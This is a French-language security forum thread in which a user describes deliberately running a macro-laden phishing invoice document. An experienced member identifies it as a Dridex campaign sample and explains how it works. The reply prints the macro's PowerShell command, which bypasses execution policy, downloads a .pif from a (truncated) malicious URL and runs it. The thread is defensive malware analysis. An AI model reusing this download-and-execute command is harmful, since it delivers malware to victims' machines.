[Clôt] Question relative à un fichier .doc avec "Macros"

Questions autour de la sécurité en général.
Pour les désinfections, merci de vous rendre dans la partie Windows --> Virus : Aide Malwares
BackToPC
newbie
newbie
Messages : 8
Inscription : 30 août 2012 10:05

[Clôt] Question relative à un fichier .doc avec "Macros"

Message par BackToPC » 30 mai 2016 20:22

Bonjour,

Je fais partie d'un service informatique. Aujourd'hui au travail, nous avons reçu un mail nous informant d'une facture en attente de paiement, d'un fournisseur évidemment inconnu. Le nom de l'expéditeur du mail ne correspondait pas à l'adresse mail associée, et l'adresse mail avait un domaine très étrange. En pièce jointe, un fichier ZIP. Il s'agissait bien évidemment d'un mail douteux. Le corps du message était rédigé dans un français tout à fait correct.

M'étant toujours intéressé à la sécurité informatique, et disposant de logiciels de sécurité corrects et à jour, toujours attentif aux bonnes pratiques (mon dernier virus attrapé, date de ... 2002), je me suis dit "tiens, et si je m'infectais volontairement, pour voir?". Je me suis donc envoyé le mail sur mon adresse perso, et j'ai attendu d'être chez moi pour ouvrir le fichier, non sans une certaine impatience :)

***

J'ai scanné le fichier avec VirusTotal, il apparaît sain, sauf pour quelques antivirus (pas les plus connus) qui suspectent un virus Macro (5 ou 6 antivirus tout au plus). Ni une ni deux, je laisse mes outils de protection activés (Malwarebytes Pro, et Webroot), lance le fichier (un simple ".DOC") et bien sûr, active la macro.

***

De ce que j'ai constaté :

- Deux fichiers .TMP sont alors créés dans le dossier Appdata\LocalLow,
- Deux entrées de démarrage correspondant à ces fichiers, avec RUNDLL, sont créées dans la base de registre avec des noms tellement étranges qu'ils suscitent tout de suite des doutes,
- Une dizaine de processus "CMD.EXE" sont lancés en arrière plan,
- Deux processus PowerShell apparaissent...

- Une tâche planifiée est créée : "User_Feed_Synchronization" (visiblement elle synchronise les flux RSS de Internet Explorer), mais elle provoque toutes les 10 minutes (lors de son exécution, en fait) des messages d'erreur RUNDLL (qui n'arrive plus à trouver les fichiers .TMP puisque je les ai supprimés).

Et... C'est tout. Aucun outil n'a bronché. Je n'ai laissé le virus s'exécuter que quelques dizaines de secondes, puis ai redémarré et ai supprimé tous les morceaux (enfin j'espère). Ma question: que pouvaient bien faire les commandes lancées dans CMD ? Attendre une connexion de l'extérieur ? Je constate aussi qu'il est facile de modifier librement beaucoup de zones du système Windows (registre, tâches planifiées...).

Merci d'éclairer mes lanternes sur ce qui était censé se passer, j'ai un peu peur maintenant :)


Avatar de l’utilisateur
ѠOOT
Geek à longue barbe
Geek à longue barbe
Messages : 1043
Inscription : 28 déc. 2011 20:39

Re: Question relative à un virus "Macro"

Message par ѠOOT » 30 mai 2016 22:49

Bonjour,

Envoyez l'archive au format zip ici ET/OU indiquez le lien VirusTotal.
‮Vous aimez la sécurité informatique ? Dopez vos neurones, achetez MISCMAG !
...nuf rof tsuJ

BackToPC
newbie
newbie
Messages : 8
Inscription : 30 août 2012 10:05

Re: Question relative à un fichier .DOC qui a des "Macros"

Message par BackToPC » 30 mai 2016 23:12

https://www.virustotal.com/fr/file/0c7a ... 464642251/

Les éditeurs d'antivirus semblent avoir commencé à réagir en cette fin de journée.

Je suis prudent, mais je ne sais pas si garder Webroot est une bonne idée, finalement.

Avatar de l’utilisateur
ѠOOT
Geek à longue barbe
Geek à longue barbe
Messages : 1043
Inscription : 28 déc. 2011 20:39

Re: Question relative à un fichier .DOC qui a des "Macros"

Message par ѠOOT » 31 mai 2016 00:34

Bonjour,

La plupart des documents Microsoft Office fonctionnent en bac à sable alors la prochaine fois évitez de prendre des risques sur votre propre machine et utilisez par exemple, Hybrid Analysis. L'échantillon 7807.doc est issu d'une campagne Dridex de fausses-factures. Ici, pas besoins de Microsoft Word ou d'explorer les flux de documents OLE car un simple balayage de chaines de caractères est suffisant pour isoler l'URL en "clair".

Image

C'est dû au fait que l'URL est stockée de cette manière:

Image

Ci-dessous, on retrouve un usage assez habituel de PowerShell via macros-commandes VBA.

cmd /c PowerShell -NoExit -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://health.councillcosmeticdental.co ... wnload.php','%TEMP%\arab.pif');Start-Process '%TEMP%\arab.pif';

Rappel: La politique d'exécution n'est pas un principe de sécurité ( malveillances via PowerShell )
Le serveur retourne actuellement un 503 (HS) donc la charge ne peut-être téléchargée & exécutée.

D'après la description des observations, votre Windows semble avoir été infecté.
Ouvrez un nouveau sujet dans cette rubrique afin de (re)vérifier votre système.
‮Vous aimez la sécurité informatique ? Dopez vos neurones, achetez MISCMAG !
...nuf rof tsuJ


Répondre

Revenir vers « Securite informatique »

Qui est en ligne ?

Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 4 invités